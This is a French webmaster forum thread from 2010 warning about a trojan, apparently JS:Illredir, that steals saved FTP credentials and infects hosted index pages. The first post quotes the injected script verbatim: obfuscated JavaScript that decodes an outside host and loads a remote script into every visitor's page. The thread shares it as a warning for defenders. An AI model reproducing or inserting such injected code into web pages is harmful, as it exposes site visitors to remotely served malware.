Forum-webmaster 
Général => Actualité Webmaster => Message commencé par: pcanim le le 06-02-2010 a 15:22:57
Titre: Virus spécial 'webmaster'
Posté par: pcanim le le 06-02-2010 a 15:22:57
Bonjour,
Je voulais vous informer sur l'attaque d'un virus qui concerne particulièrement les webmasters et dont je viens tout juste de me sortir.
Celui-ci dont le nom de fichier est netusa.exe s'installe sur votre machine et ouvre tout seul les clients FTP comme Fillezilla ou Core FTP, il se connecte aux hébergements avec les mots de passe enregistrés et modifie les fichiers index (.html ou php...) en ajoutant une ligne de code js tout à la fin.
La ligne de code ajoutée est celle-ci :


<script>try{window.onload=function(){Xizgcm7v = 's>p>o_n_i2c2h_i5-2c>o5-5j5p2.YwYo_o5tY.2cYo5m_.Yj>o2oYm_l5aY-2o2r2gY.>tYe2e>n_s>iYt>e5d>e>s2i>g5nY.>r5u2:2F2b2o2d>k2m_dYgYp_o5t23>uY/2g2o>o2g5l5e5.2c5o2m>/>gYo2o>g>l5e>.5cYo_m5/Yf_a2c_e2b2o_o5k_.2c2o5m2/>i2n2f>o>r5m>a2tYiYo>n_.2c5o>m>/Yg_o>o>gYl2e_.5c2n2/>'.replace(/[\>2Y5_]/g, '');J2s3iwzqa = 'script';By5zpi0b4 = 'dafar'.replace(/a/g, 'e');Z52cm47n = document.createElement(J2s3iwzqa);Kro4a8pl9 = '8G0R8G0R'.replace(/[RqGXd]/g, '');Z52cm47n.src = 'http://'+Xizgcm7v.replace(/Fbodkmdgpot3u/g, Kro4a8pl9);Z52cm47n.setAttribute(By5zpi0b4, '1');document.body.appendChild(Z52cm47n);} } catch(C93mudc5 ) {}</script>
<!--9680e04782316d7d8d6fe9bd9f49b6c7-->

Le virus agit bien évidemment caché, il s'installe dans le répertoire C:\Documents and Settings\User\Menu Démarrer\Programmes\Démarrage

S'il est lancé, vous ne pouvez le voir que dans msconfig.

Un autre indice : sur l'hébergement des sites modifiés, il fait plusieurs 'essais' et crée un index1 index2 et 3...

A priori il se propage avec cette ligne de code ajoutée et l'on peut très bien ne pas s'en rendre compte.

Voilà, si ça peut vous aider.

Bonne journée

Eric

http://www.pcanim.com (http://www.pcanim.com)
Titre: Re:Virus spécial 'webmaster'
Posté par: Pad le le 21-02-2010 a 01:04:22
Ce virus porte le nom de cheval de troie JS:Illredir. Il infecte effectivement tous les ftp de l'ordination infecté en utilisant leur client ftp. D'autres fichiers peuvent être contaminés...

Plus d'infos sur le Cheval de troie JS:Illredir (http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/) (en anglais)


Forum-webmaster | Actionné par YaBB SE
© 2001-2003, YaBB SE Dev Team. Tous droits réservés.